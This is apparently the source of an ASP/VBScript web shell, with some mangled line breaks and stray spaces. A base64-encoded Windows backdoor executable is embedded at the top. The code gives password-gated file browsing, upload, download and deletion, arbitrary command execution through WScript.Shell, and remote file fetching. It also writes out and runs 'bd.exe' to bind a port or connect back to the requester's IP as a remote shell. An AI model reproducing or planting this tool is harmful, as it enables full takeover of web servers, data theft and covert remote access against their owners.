"AENw2Iy4ZnNlYGJPsDPiFjtTQ2xBDyPYjFkiZAw5CFgymnGGIRrbBfZRDkPlbIYtxF4Cn3RjaFvp" _ "ZzYLmKMO7B+GHMu2aballsz/AwI0FnfLsiwEAgENzlNBU9vmaAGIIQ4JAgj8lyctc4JQRUwBAwCJ" _ "C5Q/jIj9h+AADwELAQb0J3Zy2R3UFQQQAEAAEA+2YRNiEgcXYOxsFkyiDBAHy73sDQYAaESDR0DW" _ "DQii/B7WEBvBLhh0Oi6Q4LOQDTCY+mAuck2YdYaLJwlTA5pb7JRqQC4mJxwKUPKbkkFQwBO0RQAA" _ "aMVvsyQAAAD/AAAAAAAAAAAAAABgvgBQQACNvgDA//9Xg83/6xCQkJCQkJCKBkaIB0cB23UHix6D" _ "7vwR23LtuAEAAAAB23UHix6D7vwR2xHAAdtz73UJix6D7vwR23PkMcmD6ANyDcHgCIoGRoPw/3R0" _ "icUB23UHix6D7vwR2xHJAdt1B4seg+78EdsRyXUgQQHbdQeLHoPu/BHbEckB23PvdQmLHoPu/BHb" _ "c+SDwQKB/QDz//+D0QGNFC+D/fx2D4oCQogHR0l19+lj////kIsCg8IEiQeDxwSD6QR38QHP6Uz/" _ "//9eife5cAAAAIoHRyzoPAF394A/A3XyiweKXwRmwegIwcAQhsQp+IDr6AHwiQeDxwWI2OLZjb4A" _ "UAAAiwcJwHRFi18EjYQwAHAAAAHzUIPHCP+WUHAAAJWKB0cIwHTcifl5Bw+3B0dQR7lXSPKuVf+W" _ "VHAAAAnAdAeJA4PDBOvY/5ZkcAAAi65YcAAAjb4A8P//uwAQAABQVGoEU1f/1Y2H5wEAAIAgf4Bg" _ "KH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnbof//AAAAAAAAAAAAAAAAAAAAAAAAAHyAAABQgAAA"

    & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &

    _ "AAAAAAAAAAAAAAAAiYAAAGyAAAAAAAAAAAAAAAAAAACWgAAAdIAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAoIAAAK6AAAC+gAAAzoAAANyAAADqgAAAAAAAAPiAAAAAAAAAcwAAgAAAAABLRVJORUwzMi5E" & _ "TEwAQURWQVBJMzIuZGxsAFdTMl8zMi5kbGwAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MA" & _ "AFZpcnR1YWxQcm90ZWN0AABWaXJ0dWFsQWxsb2MAAFZpcnR1YWxGcmVlAAAARXhpdFByb2Nlc3MA" & _ "AABPcGVuU2VydmljZUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" shell_style = "" &_ "<style type=""text/css"">" &_ "*{" &_ " font-family:Tahoma,Verdana,Arial;" &_ " font-size:12px;" &_ " line-height:20px;" &_ "}" &_ "" &_ "form{" &_ " margin:0 auto;" &_ " text-align:center;" &_ "}" &_ "" &_ "body{" &_ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #333333;" &_ " color:#ffffff;" &_ " margin:0;" &_ " padding:0;" &_ "}" &_ "" &_ "input,textarea{" &_ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #111111;" &_ " height:24px;" &_ " color:#ffffff;" &_ " padding:1.5px 4px 0 4px;" &_ " margin:2px 0;" &_ " border:1px solid " & shell_color & ";" &_ " border-bottom:4px solid " & shell_color & ";" &_ " vertical-align:middle;" &_ "}" &_ "" &_ "input:hover,textarea:hover{" &_ " background:#0a0a0a;" &_ "}" &_ "" &_ "a{" &_ " color:#ffffff;" &_ " text-decoration:none;" &_ "}" &_ "" &_

    "a:hover{" &_ " border-bottom:1px solid #ffffff;" &_ "}" &_ "" &_ "h1{" &_ " font-size:17px;" &_ " height:20px;" &_ " padding:2px 8px;" &_ " background:" & shell_color & ";" &_ " border:0;" &_ " border-left:4px solid " & shell_color & ";" &_ " border-right:4px solid " & shell_color & ";" &_ " border-bottom:1px solid #222222;" &_ " margin:0 auto;" &_ " width:90%;" &_ "}" &_ "" &_ "h1 img{" &_ " vertical-align:bottom;" &_ "}" &_ "" &_ ".box{" &_ " margin:0 auto;" &_ " background:#000000;" &_ " border:4px solid " & shell_color & ";" &_ " padding:4px 8px;" &_ " width:90%;" &_ " text-align:justify;" &_ "}" &_ "" &_ ".gaul{" &_ " color:" & shell_color & ";" &_ "}" &_ "" &_ ".result, .boxcode{" &_ " margin:0 auto;" &_ " border:1px solid " & shell_color & ";" &_ " font-family:Lucida Console,Tahoma,Verdana;" &_ " padding:8px;" &_ " text-align:justify;" &_ " overflow:hidden;" &_ " color:#ffffff;" &_ "}" &_ "" &_ "#explorer, table{" &_ " width:100%;" &_ "}" &_ "" &_ "table th{" &_ " border-bottom:1px solid " & shell_color & ";" &_ " background:#111111;" &_ " padding:4px;" &_ "}" &_ "" &_ "table td{" &_ " padding:4px;" &_ " border-bottom:1px solid #111111;" &_ " vertical-align:top;" &_ "}" &_ "" &_

    ".tblExplorer tr:hover, .hexview td:hover{" &_ " background:" & shell_color & ";" &_ "}" &_ "" &_ ".hidden{" &_ " display:none;" &_ "}" &_ ".tblbox td {" &_ " margin:0;" &_ " padding:0;" &_ " border-bottom:1px solid #222222;" &_ "}" &_ "" &_ ".tblbox tr:hover{" &_ " background:none;" &_ "}" &_ "" &_ "#mainwrapper{" &_ " width:100%;" &_ " margin:20px auto;" &_ " text-align:center;" &_ "}" &_ "#wrapper{" &_ " width:90%;" &_ " margin:auto;" &_ "}" &_ "" &_ ".cmdbox{" &_ " border-top:1px solid " & shell_color & ";" &_ " border-bottom:1px solid " & shell_color & ";" &_ " margin:4px 0;" &_ " width:100%;" &_ "}" &_ "" &_ ".fpath{" &_ " border-top:1px solid " & shell_color & ";" &_ " border-bottom:1px solid " & shell_color & ";" &_ " margin:4px 0;" &_ " padding:4px 0;" &_ "}" &_ "" &_ ".fprop{" &_ " border-top:1px solid " & shell_color & ";" &_ " border-bottom:1px solid " & shell_color & ";" &_ " margin:4px 0;" &_ " padding:4px 0;" &_ "}" &_ "" &_ ".bottomwrapper{" &_ " text-align:center;" &_ "}" &_ "" &_ ".btn{" &_ " height:24px;" &_ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #111111;" &_ " font-size:10px;" &_ " text-align:right;" &_ "}" &_ "" &_

    ".hexview , .hexview td{" &_ " font-family: Lucida Console,Tahoma;" &_ "}" &_ "</style>" '//################# FUNCTION GOES HERE #######################================= =============================] Function xcleanpath(path) path = urldecode(Trim(path)) strlen = Len(path) If strlen > 0 Then Do While((Mid(path,strlen) = "\") And (strlen > 0)) strlen = strlen - 1 path = Mid(path,1,strlen) Loop xcleanpath = path & "\" Else xcleanpath = path End If End Function Function is_dir(path) Set fs = CreateObject("Scripting.FileSystemObject") If fs.FolderExists(path) Then is_dir = true Else is_dir = false End If Set fs = nothing End Function Function is_file(path) Set fs = CreateObject("Scripting.FileSystemObject") If fs.FileExists(path) Then is_file = true Else is_file = false End If Set fs = nothing End Function Function dirname(path) Set fs = Server.CreateObject("Scripting.FileSystemObject") If(is_file(path) Or is_dir(path)) Then dirname = fs.getfilename(path) Else dirname = path End If set fs = nothing End Function Function nl2br(text) nl2br = Replace(text, VbCrLf, "<br />") End Function Function urldecode(str) str = Replace(str, "+", " ") For i = 1 To Len(str) sT = Mid(str, i, 1) If sT = "%" Then If i+2 < Len(str) Then sR = sR & _ Chr(CLng("&H" & Mid(str, i+1, 2))) i = i+2 End If

    Else sR = sR & sT End If Next urldecode = sR End Function Function urlencode(str) urlencode = Server.URLEncode(str) End Function Function base64_decode(base64String) Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123 456789+/" base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") dataLength = Len(base64String) For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1 ) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCo mpare) - 1 End If nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = String(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next base64_decode = sOut End Function Function sort(arr_) buff = "" For Each b in arr_ buff = buff & b & " " Next If((Len(buff)-1) > 0) Then arr = split(Mid(buff,1,Len(buff)-1)," ") For i = UBound(arr) - 1 To 0 Step -1 For j= 0 To i If((arr(j)) > (arr(j+1))) Then temp=arr(j+1) arr(j+1)=arr(j) arr(j)=temp End If Next Next sort = arr Else sort = array()

    End If End Function Function htmlspecialchars(text) text = Replace(text,"&","&amp;") text = Replace(text,"""","&quot;") text = Replace(text,"'","&#039;") text = Replace(text,"<","&lt;") text = Replace(text,">","&gt;") htmlspecialchars = text End Function Function xfilesave(FileName, content) Set FS = CreateObject("Scripting.FileSystemObject") ByteArray = str2bin(content) Set TextStream = FS.CreateTextFile(FileName) TextStream.Write bin2str(ByteArray) If is_file(Filename) Then xfilesave = true Else xfilesave = false End If End Function Function str2bin(S) For i=1 To Len(S) MultiByte = MultiByte & ChrB(Asc(Mid(S,i,1))) Next str2bin = MultiByte End Function Function bin2str(Binary) For I = 1 To LenB(Binary) S = S & Chr(AscB(MidB(Binary, I, 1))) Next bin2str = S End Function Function xfileopen(file,binary) file = urldecode(file) if(binary) Then xfileopen = ReadBinaryFile(file) Else set fs = Server.CreateObject("Scripting.FileSystemObject") If fs.FileExists(file) Then set f = fs.OpenTextFile(file,1,false) If f.AtEndOfStream Then xfileopen = "" Else xfileopen = f.ReadAll End If f.close End If set fs = nothing End If End Function Function ReadBinaryFile(FileName) Const adTypeBinary = 1 Set BinaryStream = CreateObject("ADODB.Stream") BinaryStream.Type = adTypeBinary BinaryStream.Open BinaryStream.LoadFromFile FileName ReadBinaryFile = BinaryStream.Read End Function Function xparsefilesize(size)

    If(size <= 1024) Then xparsefilesize = size Else If(size <= 1024*1024) Then size = FormatNumber(size / 1024,2) xparsefilesize = size & " kb" Else size = FormatNumber(size / 1024 / 1024,2) xparsefilesize = size & " mb" End If End If End Function Function xfileperms(file) Set fs = Server.CreateObject("Scripting.FileSystemObject") isreadable = "r" iswriteable = "-" If fs.FileExists(file) Then Set f = fs.GetFile(file) bit = f.Attributes Set f = nothing If Not (bit And 1) Then iswriteable = "w" End If Elseif fs.FolderExists(file) Then Set f = fs.GetFolder(file) bit = f.Attributes Set f = nothing If Not (bit And 1) Then iswriteable = "w" End If End If Set fs = nothing xfileperms = isreadable & " / " & iswriteable End Function Function xdateformat(tgl) If(IsDate(tgl)) Then xday = Day(tgl) If Len(xday) = 1 Then xday = "0" & xday End If xmonth = Mid(MonthName(Month(tgl)),1,3) xdateformat = xday & "-" & xmonth & "-" & Year(tgl) & " " & Form atDateTime(tgl,4) End If End Function Function xfilelastmodified(file) If(Len(file) > 3) Then Set fs = Server.CreateObject("Scripting.FileSystemObject") If fs.FileExists(file) Then Set f = fs.GetFile(file) tgl = f.DateLastModified Set f = nothing xfilelastmodified = xdateformat(tgl) ElseIf fs.FolderExists(file) Then Set f = fs.GetFolder(file) tgl = f.DateLastModified Set f = nothing xfilelastmodified = xdateformat(tgl) Else xfilelastmodified = "???"

    End If Else xfilelastmodified = xdateformat(CDate("01/01/1980 00:00")) End If Set fs = nothing End Function Function xparentfolder(dir) dir = xcleanpath(dir) Set fs = Server.CreateObject("Scripting.FileSystemObject") If fs.FolderExists(dir) Then If Len(dir) = 3 Then xparentfolder = xcleanpath(dir) Else xparentfolder = xcleanpath(fs.GetParentFolderName(dir)) End If Else xparentfolder = dir End If Set fs = nothing End Function Function xfilesummary(file) buff= "" If(is_file(file)) Then buff = "Filesize : " & xparsefilesize(xfilesize(file)) & " ( " & xfilesize(file) & " ) <span class=""gaul""> :: </span>Permission : " & xfileper ms(file) & " ( " & xfileowner(file) & " )<span class=""gaul""> :: </span>modifie d : " & xfilelastmodified(file) End If xfilesummary = buff End Function Function xfilesize(file) Set fs = Server.CreateObject("Scripting.FileSystemObject") If fs.FileExists(file) Then Set f = fs.GetFile(file) xfilesize = f.Size Set f = nothing Else xfilesize = 0 End If Set fs = nothing End Function Function xfileowner(strFile) If Mid(strFile,Len(strFile)) = "\" Then strfile = Mid(strfile,1,len(strfile)-1) End If On Error Resume Next strComputer = "." Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\ cimv2") Set objCollection = objWMIService.ExecQuery _ ("ASSOCIATORS OF {Win32_LogicalFileSecuritySetting='" & strFile _ & "'} WHERE AssocClass=Win32_LogicalFileOwner ResultRole=Owner") For Each objSID in objCollection If objSID.AccountName <> "" Then xfileowner = objSID.AccountName End If Next If xfileowner = "" Then xfileowner = "Everyone"

    End If End Function Function ekse(cmd) Set sh = Server.CreateObject("WScript.Shell") curdir = Request.QueryString("dir") if(curdir = "") Then Dim CurPath Set CurPath = CreateObject("Scripting.FileSystemObject") curdir = CurPath.GetAbsolutePathName(".") Set CurPath = nothing End If pos = InStr(curdir,":") curdrive = Mid(curdir,1,pos) chdir = curdrive & " && " & "CD """ & curdir & """" Set pipe = sh.Exec("%COMSPEC% /C " & chdir & " && " & cmd) output = pipe.StdOut.ReadAll() & pipe.StdErr.ReadAll() Set sh = nothing Set pipe = nothing ekse = output End Function Function OSver() Set WshShell = Server.CreateObject("Wscript.Shell") Set OSchk = WshShell.Environment OSver = OSchk("OS") Set WshShell = nothing Set OSchk = nothing If (OSver = "") Then OSver = ekse("ver") End If End Function Function xtrim(str) Set myRegExp = New RegExp myRegExp.IgnoreCase = True myRegExp.Global = True myRegExp.Pattern = "^" & VbCrLf xtrim = Trim(myRegExp.Replace(str,"")) myRegExp.Pattern = VbCrLf & "$" xtrim = Trim(myRegExp.Replace(str,"")) Set myRegExp = nothing End Function Function xparsedir(dir) dirs = split(dir,"\") buff = "" dlink = "" For Each d in dirs d = xtrim(d) If(d <> "") Then dlink = dlink & Server.URLEncode(d & "\") buff = buff & "<a href=""?dir=" & dlink & """>" & d & " " & "\" & "</a>&nbsp;" End If Next xparsedir = "<span class=""gaul"">[ </span>" & buff & "<span class=""gaul""> ]</span>" End Function Sub xwget(myURL,myPath) Dim i, objFile, objFSO, objHTTP, strFile, strMsg Const ForReading = 1, ForWriting = 2, ForAppending = 8 Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.FolderExists( myPath ) Then

    strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) ) ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Th en strFile = myPath Else Exit Sub End If Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True ) Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) objHTTP.Open "GET", myURL, False objHTTP.Send For i = 1 To LenB( objHTTP.ResponseBody ) objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) ) Next objFile.Close( ) End Sub Function xrunexploit(fpath,base64,port,tipe) con = base64_decode(base64) fname = "bd.exe" ip = "" ok = false fpath = xcleanpath(fpath) & fname If(is_file(fpath)) Then unlink(fpath) End If If(xfilesave(fpath,con)) Then fpath = Trim(fpath) If(tipe = "connect") Then ip = Request.ServerVariables("REMOTE_A DDR") final = fpath & " " & port & " " & ip ekse(Trim(final)) xrunexploit = true Else xrunexploit = false End If End Function Function xdrive() Dim fs,d,n,letters letters = "" Set fs = Server.CreateObject("Scripting.FileSystemObject") Set d = fs.Drives For Each letter in d letter = mid(letter,1,1) letters = "<a href=""?dir=" & letter & ":\""><span class=""gaul" ">[ </span>" letters = letters & letter letters = letters & "<span class=""gaul""> ]</span</a> " buff = buff & letters Next Set d = nothing Set fs = nothing If(buff <> "") Then buff = buff & "<br />" End If xdrive = buff End Function Public Sub xrmdir(path) path = xcleanpath(path) path = Mid(path,1,Len(path)-1)

    Set Set Set Set Set For

    fs = Server.CreateObject("Scripting.FileSystemObject") f = fs.GetFolder(path) fname = f.Files dname = f.subFolders fs = nothing Each frm in fname unlink(frm)

    Next For Each drm in dname xrmdir(drm) Next f.Delete(true) Set f = nothing End Sub Function unlink(path) Set fs = Server.CreateObject("Scripting.FileSystemObject") If fs.FileExists(path) Then Set f = fs.GetFile(path) f.Delete Set f = nothing End If Set fs = nothing End Function Function mkdir(path) Set fs = Server.CreateObject("Scripting.FileSystemObject") If Not fs.FolderExists(path) Then fs.CreateFolder(path) End If Set fs = nothing End Function Function xdir(path) path = Trim(urldecode(path)) path = xcleanpath(path) buff = "" If(is_dir(path)) Then Set fs = Server.CreateObject("Scripting.FileSystemObject") Set f = fs.GetFolder(path) Set xfname = f.Files Set xdname = f.subFolders Set f = nothing Set fs = nothing xfname = sort(xfname) xdname = sort(xdname) buff = "<div id=""explorer""><table class=""tblExplorer"">" &_ "<tr><th>Filename</th>" &_ "<th style=""width:80px;"">Filesize</th>" &_ "<th style=""width:80px;"">Permission</th>" &_ "<th style=""width:150px;"">Last Modified</th>" &_ "<th style=""width:180px;"">Action</th></tr>" If(Len(path) > 3) Then sd = "." dd = xcleanpath(path) buff = buff & "<tr onmouseover=""this.style.cursor='poin ter';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode( dd) & "';"">" &_ "<td><span style=""font-weight:bold;""><a href=""?dir=" & xcleanpath(dd) & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</ span></a></td>" &_ "<td>DIR</td>" &_ "<td style=""text-align:center;"">" & xfileperms(dd) & "

    </td>" &_ "<td style=""text-align:center;"">" & xfilelastmodified( dd) & "</td>" &_ "<td style=""text-align:center;""><a href=""?dir=" & dd & "&properties=" & xcleanpath(dd) & """>Properties</a> <a href=""?dir=" & xcle anpath(xparentfolder(dd)) & "&del=" & xcleanpath(dd) & """>Remove</a></td>" &_ "</tr>" sd = ".." dd = xcleanpath(xparentfolder(path)) buff = buff & "<tr onmouseover=""this.style.cursor='poin ter';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode( dd) & "';"">" &_ "<td><span style=""font-weight:bold;""><a href=""?dir="& dd & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td >" &_ "<td>DIR</td>" &_ "<td style=""text-align:center;"">" & xfileperms(dd) & " </td>" &_ "<td style=""text-align:center;"">" & xfilelastmodified( dd) & "</td>" &_ "<td style=""text-align:center;""><a href=""?dir=" & xcl eanpath(dd) & "&properties=" & xcleanpath(dd) & """>Properties</a> <a href=""? dir=" & xcleanpath(xparentfolder(xparentfolder(dd))) & "&del=" & xcleanpath(dd) & """>Remove</a></td>" &_ "</tr>" End If For Each d In xdname sd = dirname(d) nextdir = xcleanpath(path) buff = buff & "<tr onmouseover=""this.style.cursor='poin ter';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode( d) & "';"">" &_ "<td><span style=""font-weight:bold;""><a href=""?dir="& xcleanpath(d) & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</sp an></a></td>" &_ "<td>DIR</td>" &_ "<td style=""text-align:center;"">" & xfileperms(d) & "< /td>" &_ "<td style=""text-align:center;"">" & xfilelastmodified( d) & "</td>" &_ "<td style=""text-align:center;""><a href=""?dir=" & xcl eanpath(d) & "&properties=" & xcleanpath(d) & """>Properties</a> <a href=""?di r=" & xcleanpath(nextdir) & "&del=" & xcleanpath(d) & """>Remove</a></td>" &_ "</tr>" Next For Each f In xfname sf = dirname(f) view = "?dir=" & urlencode(path) & "&view=" & urlencode( f) buff = buff & "<tr onmouseover=""this.style.cursor='poin ter';this.style.cursor='hand';"" onclick=""window.location='?dir=" & urlencode(x cleanpath(path)) & "&properties=" & urlencode(f) & "';""><td>" &_ "<a href=""?dir=" & urlencode(xcleanpath(path)) & "&prop erties=" & urlencode(f) & """>" &_ sf & "</a></td>" &_ "<td>" & xparsefilesize(xfilesize(f)) & "</td>" &_ "<td style=""text-align:center;"">" & xfileperms(f) & "< /td>" &_ "<td style=""text-align:center;"">" & xfilelastmodified( f) & "</td>" &_

    "<td style=""text-align:center;""><a href=""" & view & " "">Edit</a> <a href=""?get=" & f & """>Download</a> <a href=""?dir=" & xclea npath(path) & "&del=" & f & """>Remove</a></td>" &_ "</tr>" Next buff = buff & "</table></div>" xdir = buff Set xdname = nothing Set xfname = nothing End If End Function Class FileUploader Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Scripting.Dictionary") Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.I tem(LCase(sIndex)) End Property Public Default Sub Upload() biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteStrin g("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Conten t-Disposition")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)) ) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd -nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("fi lename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString (Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))

    oUploadFile.FileName = Right(sFileName, Len(sFil eName)-InStrRev(sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Cont ent-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString( Chr(13))) oUploadFile.ContentType = CWideString(MidB(biDat a, nPosBegin, nPosEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, n PosEnd-nPosBegin) If oUploadFile.FileSize > 0 Then Files.Add LCase (sInputName), oUploadFile Else nPos = InstrB(nPos, biData, CByteString( Chr(13))) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDat aBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Th en mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosE nd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds) , biData, vDataBounds) Loop End Sub Private Function CByteString(sString) For nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex ,1))) Next End Function Private Function CWideString(bsString) CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nInde x,1))) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scripting.FileSystemObject") If Not oFS.FolderExists(sPath) Then Exit Sub

    Set oFile = oFS.CreateTextFile(sPath & FileName, True) For nIndex = 1 to LenB(FileData) oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) Next oFile.Close End Sub End Class '//################# INIT GOES HERE #######################===================== =============================] If(Request.Form("passw") <> "") Then check = Trim(Request.Form("passw")) If(check = shell_password) Then Response.Cookies("pass") = check Response.Cookies("pass").Expires = Date + 7 Else Response.Cookies("pass") = check Response.Cookies("pass").Expires = Date - 7 End If End If If(Request.Cookies("pass") <> "") Then check = Request.Cookies("pass") Else check = "" End If If(check = shell_password) Then auth = true Else auth = false End If If(Request.QueryString("img") <> "") Then file = Request.QueryString("img") if(is_file(file)) Then Response.Clear Response.ContentType= "image/jpeg" Response.BinaryWrite ReadBinaryFile(file) Response.End Else Response.Clear Response.Buffer = true Response.ContentType = "image/png" If file = "bg" Then buff = str2bin(base64_decode(bg)) Else buff = str2bin(base64_decode(icon)) End If Response.BinaryWrite buff Response.End End If End If If(Request.QueryString("get") <> "") Then file = Request.QueryString("get") fname = Mid(file,InStrRev(file,"\")+1) Response.ContentType = "application/x-msdownload" Response.AddHeader "Content-transfer-encoding", "binary" Response.AddHeader "Content-Disposition", "attachment;filename="& fname &"" dim txt, objStream Set objStream = Server.CreateObject("ADODB.Stream") objStream.Mode = 3 objStream.open

    objStream.loadfromfile file txt = objStream.readtext(-1) response.binarywrite(txt) objStream.close set objStream = nothing txt = null Response.End End If If((Request.QueryString("btnConnect") <> "") And (IsNumeric(Request.QueryString( "bportC")))) Then port = Request.QueryString("bportC") dir = xcleanpath(Trim(Request.QueryString("dir"))) If(xrunexploit(dir,wBind,port,"connect"))Then End If ElseIf((Request.QueryString("btnListen") <> "") And (IsNumeric(Request.QueryStri ng("lportC")))) Then port = Request.QueryString("lportC") dir = xcleanpath(Trim(Request.QueryString("dir"))) if(xrunexploit(dir,wBind,port,"listen"))Then End If End If uploaded = false If(Request.QueryString("dir") = "") Then xCwd = Mid(Request.ServerVariables("PATH_TRANSLATED"),1,InStrRev(Request .ServerVariables("PATH_TRANSLATED"),"\")) Else newdir = xcleanpath(Trim(Request.QueryString("dir"))) If (is_dir(newdir)) Then xCwd = newdir End If If(Request.QueryString("upload") <> "") Then uploaded = true Set Up = New FileUploader Up.Upload() If(Up.Form("btnNewUploadLocal") <> "") Then Uploaded = true If Up.Files.Count > 0 Then For Each File In Up.Files.Items If(Up.Form("filename") <> "") Then File. Filename = Up.Form("filename") File.SaveToDisk xCwd Next End If Elseif(Up.Form("btnNewUploadUrl") <> "") Then targeturl = Up.Form("fileurl") If targeturl <> "" Then If(Up.Form("filename") <> "") Then upname = Up.Form("filename") Else upname = Mid(targeturl,InStrRev(targetur l,"/")) End If targetpath = xCwd & upname xwget targeturl,targetpath End If End If End If If(Request.QueryString("foldername") <> "") Then fname = xcleanpath(Trim(Request.QueryString("foldername")))

    If(NOT is_dir(newdir & fname)) Then mkdir(newdir & fname) End If ElseIf(Request.QueryString("del") <> "") Then fdel = Trim(Request.QueryString("del")) If(is_file(fdel)) Then unlink(fdel) Elseif(is_dir(fdel)) Then xrmdir(fdel) newdir = xparentfolder(fdel) End If Elseif(Request.QueryString("childname") <> "") Then childname = newdir & Trim(Request.QueryString("childname")) con = xfileopen(Request.ServerVariables("PATH_TRANSLATED"),false ) If(xfilesave(childname,con)) Then End If End If End If xCwd = xcleanpath(xCwd) If(Request.QueryString("cmd") <> "") Then Dim cmd,pos,newdir cmd = Trim(Request.QueryString("cmd")) pos = InStr(LCase(cmd),"cd ") If pos = 1 Then newdir = Trim(Mid(cmd,3)) if(newdir = "\") Then xCwd = Mid(xCwd,1,3) Else If(InStr(newdir,":") > 0) Then if(is_dir(newdir)) Then xCwd = xcleanpath(newdir) Set CurPath = CreateObject("Scripting.Fi leSystemObject") xCwd = xcleanpath(CurPath.GetAbsolutePat hName(xcwd)) Set CurPath = nothing End If Else If(is_dir(xCwd & newdir)) Then xCwd = xcleanpath(xCwd & newdir) Set CurPath = CreateObject("Scripting.Fi leSystemObject") xCwd = xcleanpath(CurPath.GetAbsolutePat hName(xcwd)) Set CurPath = nothing End If End If End If result = xdir(xCwd) ElseIf((Len(cmd) <= 3) And (InStr(cmd,":") > 0)) Then If(is_dir(cmd)) Then xCwd = UCase(Mid(cmd,1,1)) & ":\" End If result = xdir(xCwd) Else result = ekse(cmd) if(result = "") Then result = xdir(xCwd) Else

